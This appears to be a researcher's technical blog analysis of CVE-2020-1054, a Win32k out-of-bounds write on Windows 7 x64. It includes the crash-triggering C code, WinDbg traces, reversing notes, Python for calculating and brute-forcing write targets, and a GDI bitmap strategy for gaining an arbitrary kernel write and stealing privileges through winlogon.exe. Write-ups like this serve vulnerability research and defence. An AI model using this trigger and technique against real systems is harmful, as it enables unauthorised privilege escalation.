This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s OffensiveCon20 talk, Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).


The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point, and I did not do any patch diffing. Patch diffing can still be very useful in these circumstances; however, I found it unnecessary in this case.

The provided crash code:

#include <windows.h>

int main(int argc, char *argv[])
{
    LoadLibraryA("user32.dll");
    HDC r0 = CreateCompatibleDC(NULL);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    // hIcon is a raw handle value; cyWidth is an int, so the value
    // actually passed is the low 32 bits of the literal (0xfebffffc)
    DrawIconEx(r0, 0x0, 0x0, (HICON)0x30000010003, 0x0,
        (int)0xfffffffffebffffc, 0x0, NULL, 0x6);

    return 0;
}

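I suggest reviewing the documentation for CreateCompatibleBitmap and DrawIconEx. Note that this post numbers function arguments from zero, so arg1 and arg2 of CreateCompatibleBitmap are the width and height, arg5 of DrawIconEx is cyWidth, and arg8 is diFlags.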
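For readers following along, the short Python sketch below labels each argument of the crash call with its DrawIconEx parameter name by zero-based position, and shows how the 64-bit literal given as cyWidth becomes a 32-bit int. It is only an illustration, not part of the PoC; the helper to_int32 is hypothetical and assumes plain two's-complement truncation of the literal to the int parameter.

```python
# Illustrative only: label the arguments of the crash call to DrawIconEx.
# Parameter names follow the DrawIconEx documentation; list index == "argN".
DRAWICONEX_PARAMS = [
    "hdc", "xLeft", "yTop", "hIcon", "cxWidth",
    "cyWidth", "istepIfAniCur", "hbrFlickerFreeDraw", "diFlags",
]

# Argument values from the crash code ("r0" stands in for the HDC).
crash_args = ["r0", 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 0x0, 0x0, 0x6]


def to_int32(value: int) -> int:
    """Keep the low 32 bits and reinterpret them as a signed 32-bit int."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


for index, (name, value) in enumerate(zip(DRAWICONEX_PARAMS, crash_args)):
    shown = value if isinstance(value, str) else hex(value)
    print(f"arg{index} {name:<20} {shown}")

cy = to_int32(crash_args[5])
print(f"cyWidth as 32-bit int: {cy} (0x{cy & 0xFFFFFFFF:08x})")
```

The low 32 bits, 0xfebffffc, are the value the rest of the post refers to as arg5.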

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

STACK_TEXT:  
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

image 1

It is clear that the crash occurs due to an invalid memory reference, which matches the WinDbg bugcheck analysis. Check Point Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be referenced continually throughout the blog post. This value changes across system reboots and sometimes per program execution; however, for the sake of continuity it is kept the same throughout.


Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240, referred to from here on as oob_target, can be controlled. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

image 2

Working further backwards, rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

image 3

In the loop, a constant value is added to rcx; in the assembly this is add ecx, eax. A pseudo-code snippet of the loop:

var_64h = 0x7fffffff;
var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_64h )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical to arg5 of DrawIconEx (0xfebffffc), but it looks related. Changing arg5 from 0xfebffffc to 0xfebffffd:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The first dword becomes fff2aaac, which confirms that it is related to arg5.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd000000 there is a major change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5, the lower 32 bits of oob_target remain c7000240. Additionally, decreasing arg5 (treated as unsigned) increases oob_target.

eax in the oob_target formula is set via an offset from r15:

image 4

Offsets from r15 are used frequently near the beginning of vStrWrite01, which suggests that r15 holds the address of some structure. In the second basic block of the function, r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

image 5

The two red boxes mark values that are already known. The first red box contains arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times: the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout may look familiar in the context of Win32k bitmaps, and indeed it is two adjacent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SURFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.
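To make the offsets concrete, here is a ctypes sketch of BASEOBJECT followed by SURFOBJ on x64, meant to be run on a 64-bit Python. The SURFOBJ field order follows the public winddi.h definition; the BASEOBJECT fields (hHmgr, ulShareCount, cExclusiveLock, BaseFlags, Tid) follow the layout commonly used in GDI exploitation write-ups and should be treated as an assumption, as should the hypothetical name SURFACE_HEADER64. Under those assumptions sizlBitmap lands at +0x38, which is consistent with the 0x70038 write target used later in this post.

```python
import ctypes


class SIZEL(ctypes.Structure):
    _fields_ = [("cx", ctypes.c_int32), ("cy", ctypes.c_int32)]


class BASEOBJECT64(ctypes.Structure):
    # Assumed x64 layout of the GDI object header (0x18 bytes).
    _fields_ = [
        ("hHmgr", ctypes.c_uint64),
        ("ulShareCount", ctypes.c_uint32),
        ("cExclusiveLock", ctypes.c_uint16),
        ("BaseFlags", ctypes.c_uint16),
        ("Tid", ctypes.c_uint64),
    ]


class SURFOBJ64(ctypes.Structure):
    # Field order from winddi.h; pointer-sized fields modelled as 64-bit integers.
    _fields_ = [
        ("dhsurf", ctypes.c_uint64),
        ("hsurf", ctypes.c_uint64),
        ("dhpdev", ctypes.c_uint64),
        ("hdev", ctypes.c_uint64),
        ("sizlBitmap", SIZEL),
        ("cjBits", ctypes.c_uint32),
        ("pvBits", ctypes.c_uint64),
        ("pvScan0", ctypes.c_uint64),
        ("lDelta", ctypes.c_int32),
        ("iUniq", ctypes.c_uint32),
        ("iBitmapFormat", ctypes.c_uint32),
        ("iType", ctypes.c_uint16),
        ("fjBitmap", ctypes.c_uint16),
    ]


class SURFACE_HEADER64(ctypes.Structure):
    # Hypothetical name for "BASEOBJECT immediately followed by SURFOBJ".
    _fields_ = [("BaseObject", BASEOBJECT64), ("SurfObj", SURFOBJ64)]


def surfobj_field_offset(name: str) -> int:
    """Offset of a SURFOBJ field from the start of the whole object."""
    return SURFACE_HEADER64.SurfObj.offset + getattr(SURFOBJ64, name).offset


for field in ("sizlBitmap", "pvScan0", "lDelta"):
    print(f"{field:<10} +0x{surfobj_field_offset(field):x}")
```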

The next step, however, is to fully understand how the number of iterations in the oob_target formula is controlled via arg5 of DrawIconEx. Determining this follows a similar process to the one used above, but with additional steps, so only the results are shared here. The relevant function is vInitStrDDA; the notes.txt file in my GitHub repo contains extra detail.

The relationship between DrawIconEx’s arg5 and loop_iterations is captured by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered is that arg5 of DrawIconEx and arg1 of CreateCompatibleBitmap directly control loop_iterations and lDelta, respectively. However, the lower 32 bits of oob_target always remain the same, which means only the upper 32 bits of the write address are controllable.
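As a sanity check, the formula can be wrapped into a function that predicts the whole oob_target. This is a sketch under two assumptions: the base is the bitmap’s pvScan0 from the crash session (fffff900'c7000240, which changes per boot), and, as observed above, only the part of loop_iterations * lDelta above the lower 32 bits is added. With the 0x51500-wide bitmap it reproduces the addresses seen in WinDbg for arg5 values of 0xfebffffc, 0xff000000 and 0xfd000000.

```python
# Assumed pvScan0 of the 0x51500 x 0x100 bitmap in the crash session; varies per boot.
PVSCAN0 = 0xFFFFF900C7000240


def loop_iterations(arg5: int) -> int:
    """Iteration count derived from DrawIconEx arg5 (cyWidth), per the formula above."""
    return ((1 - arg5) & 0xFFFFFFFF) // 0x30


def l_delta(width: int) -> int:
    """Bytes per scanline: arg1 of CreateCompatibleBitmap // 8."""
    return width // 8


def oob_target(arg5: int, width: int, pvscan0: int = PVSCAN0) -> int:
    """Predicted OOB address: only the increment above the lower 32 bits is added."""
    upper32_inc = (loop_iterations(arg5) * l_delta(width)) & 0xFFFFFFFF00000000
    return pvscan0 + upper32_inc


for arg5 in (0xFEBFFFFC, 0xFF000000, 0xFD000000, 0xFFB00000):
    target = oob_target(arg5, 0x51500)
    print(f"arg5 {arg5:08x} -> {target >> 32:08x}'{target & 0xFFFFFFFF:08x}")
```

The last value, 0xffb00000, gives an increment of exactly 0x100000000, i.e. fffff901'c7000240.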

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 reveals two instructions that perform the write:

// write 1
win32k!vStrWrite01+0x417
mov     dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

image 5

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

With this call to DrawIconEx, the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of DrawIconEx stands out to me. The current call sets this parameter to 0x6. According to the documentation, 0x6 is DI_IMAGE (0x2), which “Draws the icon or cursor using the image”, combined with DI_COMPAT (0x4), which is ignored. The flag DI_MASK (0x1) sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.
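The flag values involved can be decoded with a few lines of Python. The constants are the documented DI_* values for DrawIconEx; the helper decode_di_flags is hypothetical and only shows which bits are set in the two diFlags values discussed here.

```python
# Documented DrawIconEx diFlags values (WinUser.h).
DI_FLAGS = {
    0x0001: "DI_MASK",
    0x0002: "DI_IMAGE",
    0x0004: "DI_COMPAT",
    0x0008: "DI_DEFAULTSIZE",
    0x0010: "DI_NOMIRROR",
}


def decode_di_flags(value: int) -> list[str]:
    """Return the names of the DI_* bits set in value (DI_NORMAL is DI_MASK | DI_IMAGE)."""
    return [name for bit, name in DI_FLAGS.items() if value & bit]


print(hex(0x6), decode_di_flags(0x6))  # crash code value: AND branch
print(hex(0x1), decode_di_flags(0x1))  # DI_MASK only: OR branch
```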

Exploitation Strategy

Now that the capabilities of the OOB write are understood, it is time to develop an exploitation strategy. The capabilities are a far cry from an all-powerful write-what-where; however, in situations like these I like to recall that it is possible to exploit a single-byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan0 and sizlBitmap. pvScan0 points to the actual bitmap data, which can be read and written using GetBitmapBits and SetBitmapBits. sizlBitmap is two dwords that contain the width and height of the bitmap. Classically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan0 with the address of the second SURFOBJ’s (referred to as Worker) pvScan0 member. This then allows a reusable/relocatable write-what-where primitive. By contrast, the capabilities of this OOB write are:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option that takes advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10), each SURFOBJ and the bitmap data its pvScan0 points to are laid out contiguously. This means that if it is possible to increase either the width or height in sizlBitmap, it will be possible to write out-of-bounds of the SURFOBJ’s bitmap data using a call to SetBitmapBits. If a second SURFOBJ is allocated after the first, the second object’s pvScan0 can be overwritten. This second SURFOBJ can then be used via SetBitmapBits for a powerful write-what-where primitive.
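The sizlBitmap technique can be illustrated with a toy model in plain Python. This is not Windows code: a bytearray stands in for contiguous kernel memory, set_bitmap_bits is a hypothetical stand-in for SetBitmapBits, the OR value 0x100 is arbitrary, and the offsets (sizlBitmap at +0x38, pvScan0 at +0x50, bits at +0x240) are assumptions matching the values seen in this post. Three fake surfaces S0, S1 and S2 sit back to back; once S1’s height is OR’d to a larger value, a bounded write through S1 reaches S2’s pvScan0, which then redirects writes through S2.

```python
import struct

# Toy model only: a bytearray stands in for contiguous session-pool memory.
MEM = bytearray(0x3000)
SIZL_OFF, PVSCAN0_OFF, BITS_OFF = 0x38, 0x50, 0x240  # assumed offsets
S0, S1, S2 = 0x0000, 0x1000, 0x2000                  # three adjacent fake surfaces


def read_u32(addr: int) -> int:
    return struct.unpack_from("<I", MEM, addr)[0]


def read_u64(addr: int) -> int:
    return struct.unpack_from("<Q", MEM, addr)[0]


def make_surface(base: int, width: int, height: int) -> None:
    """Write sizlBitmap (cx, cy) and point pvScan0 at the bits after the header."""
    struct.pack_into("<II", MEM, base + SIZL_OFF, width, height)
    struct.pack_into("<Q", MEM, base + PVSCAN0_OFF, base + BITS_OFF)


def capacity(base: int) -> int:
    """Bytes a 1bpp bitmap of this size holds: (cx // 8) * cy."""
    cx, cy = struct.unpack_from("<II", MEM, base + SIZL_OFF)
    return (cx // 8) * cy


def set_bitmap_bits(base: int, data: bytes) -> int:
    """Hypothetical SetBitmapBits stand-in: copy up to capacity() bytes to pvScan0."""
    n = min(len(data), capacity(base))
    dst = read_u64(base + PVSCAN0_OFF)
    MEM[dst:dst + n] = data[:n]
    return n


for base in (S0, S1, S2):
    make_surface(base, 0x100, 0x10)  # 0x200 bytes of bits each

# Bytes from S1's bits up to and including S2's pvScan0 field.
needed = (S2 + PVSCAN0_OFF + 8) - read_u64(S1 + PVSCAN0_OFF)
print(f"needed 0x{needed:x}, capacity before 0x{capacity(S1):x}")

# 1. The OOB OR enlarges S1's height (cy), standing in for the vStrWrite01 write.
cy_addr = S1 + SIZL_OFF + 4
struct.pack_into("<I", MEM, cy_addr, read_u32(cy_addr) | 0x100)
print(f"capacity after 0x{capacity(S1):x}")

# 2. Rewrite everything up to S2's pvScan0 unchanged, then replace pvScan0.
#    (A real exploit could first read these bytes back with GetBitmapBits.)
TARGET = 0x100  # hypothetical address to write to
start = read_u64(S1 + PVSCAN0_OFF)
payload = bytes(MEM[start:S2 + PVSCAN0_OFF]) + struct.pack("<Q", TARGET)
written = set_bitmap_bits(S1, payload)

# 3. Writes through S2 now land at TARGET: a reusable write-what-where.
set_bitmap_bits(S2, b"AAAA")
print(bytes(MEM[TARGET:TARGET + 4]))
```

Preserving the bytes between the two pvScan0 fields matters in the model: overwriting S2’s sizlBitmap with zeros would shrink its capacity to nothing.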

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c7000000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocated at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
3. Calculate loop_iterations*lDelta such that oob_target equals fffff901'c7000240
   (i.e. the upper 32 bits increase by exactly 1).
4. Use the OOB write to overwrite the width or height of the second SURFOBJ's sizlBitmap.
5. Use SetBitmapBits with the second SURFOBJ to overwrite the pvScan0 of the third SURFOBJ.
6. A reusable arbitrary write is now obtained.
7. Perform a typical EoP: overwrite the process token's privileges and inject into winlogon.exe.

A bad visual representation:

image 6

Every step is easily accomplished with the exception of step 4. The ‘what’ part of the write is not a problem: as seen earlier, a bitwise OR can be performed, and an OR can only set bits, so the OR’d value never decreases (and grows whenever a new bit is set), which is what is required. Accurately targeting the width or height of sizlBitmap is the challenge. Recall from the start of the blog post that oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is in place, it is time to see how rax can be controlled to gain finer control over the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

image 7

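This makes it possible to choose where the write lands relative to c7000000 (the lower 32 bits are c7000000 + offset). Dividing by 0x20 and multiplying by 4 is consistent with a 1bpp bitmap storing 32 pixels per DWORD:

offset = (arg1 // 0x20) * 0x4 + 0x240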

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

image 8

The distance between consecutive sets of writes equals an earlier variable, lDelta. In pseudo-code:

initial_value = 0xfffff901c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while (arg2)
{
    write_location_1 = initial_value + lDelta * loop_count;
    write_location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}
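The pseudo-code can be turned into a small Python generator that lists the addresses written for a given arg1, arg2 and lDelta. It models the observed behaviour rather than transcribing vStrWrite01, and it assumes the base write address fffff901'c7000240 from the exploitation strategy. For example, arg1 = 0x40, arg2 = 2 and an lDelta of 0x6fdf0 place the second set of writes on fffff901'c7070038 and fffff901'c707003c.

```python
BASE_WRITE = 0xFFFFF901C7000240  # assumed oob_target before the arg1 offset


def write_locations(arg1: int, arg2: int, l_delta: int, base: int = BASE_WRITE):
    """Yield (write_location_1, write_location_2) for each of the arg2 sets of writes."""
    initial_value = base + (arg1 // 0x20) * 0x4
    for loop_count in range(arg2):
        write_location_1 = initial_value + l_delta * loop_count
        yield write_location_1, write_location_1 + 4


for w1, w2 in write_locations(0x40, 2, 0x6FDF0):
    print(f"{w1:016x} {w2:016x}")
```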

Effectively, three values need to be solved for such that at some point in the loop write_location_1 and write_location_2 land on the width and height in surfobj1’s (the second SURFOBJ’s) sizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...")

# start with size at 0x50000
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8
    # only keep lDelta values that are 16-byte aligned
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0, 0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, "
                          "loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))
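The same search can also be turned around: for each arg1 and loop count, the required lDelta is fully determined, so it only needs to be checked for divisibility, alignment and size. The sketch below is a rearrangement of the brute force above, not the script used for the exploit. It keeps the same assumptions (target 0x70038, 16-byte-aligned lDelta, width from 0x50000 up to 0xffffff, width = lDelta * 8) and reports only the smallest width for each lDelta. Under the pseudo-code above, reaching a given loop_count requires DrawIconEx’s arg2 to be at least loop_count + 1, since the first set of writes happens at loop_count 0.

```python
TARGET = 0x70038     # second SURFOBJ's sizlBitmap, relative to c7000000
MIN_WIDTH = 0x50000  # same lower bound as the brute force
MAX_WIDTH = 0xFFFFFF


def solve(target: int = TARGET):
    """Return (width, arg1, lDelta, loop_count) with offset + loop_count * lDelta == target."""
    results = []
    for arg1 in range(0x0, 0xFFF, 0x20):
        offset = (arg1 // 0x20) * 0x4 + 0x240
        remaining = target - offset
        for loop_count in range(1, 0x10):
            if remaining % loop_count:
                continue  # lDelta would not be an integer
            l_delta = remaining // loop_count
            width = l_delta * 8
            if l_delta & 0xF == 0 and MIN_WIDTH <= width < MAX_WIDTH:
                results.append((width, arg1, l_delta, loop_count))
    return results


for width, arg1, l_delta, loop_count in solve():
    print(f"width {width:x}, arg1 {arg1:x}, lDelta {l_delta:x}, loop_count {loop_count:x}")
```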

Now that all values are understood, all that remains is to write the exploit code.


Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

image 9

Windows 7 KB

Testing the exploit on Windows 7 has proved very reliable. However, there is room for improvement to make the memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly: instead of the offset being 0x240, it is 0x238. The exploit code contains two comments that mark which value to use depending on whether the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.


Thanks to Netanel Ben-Simon, Yoav Alon and bee13oy for finding the bug.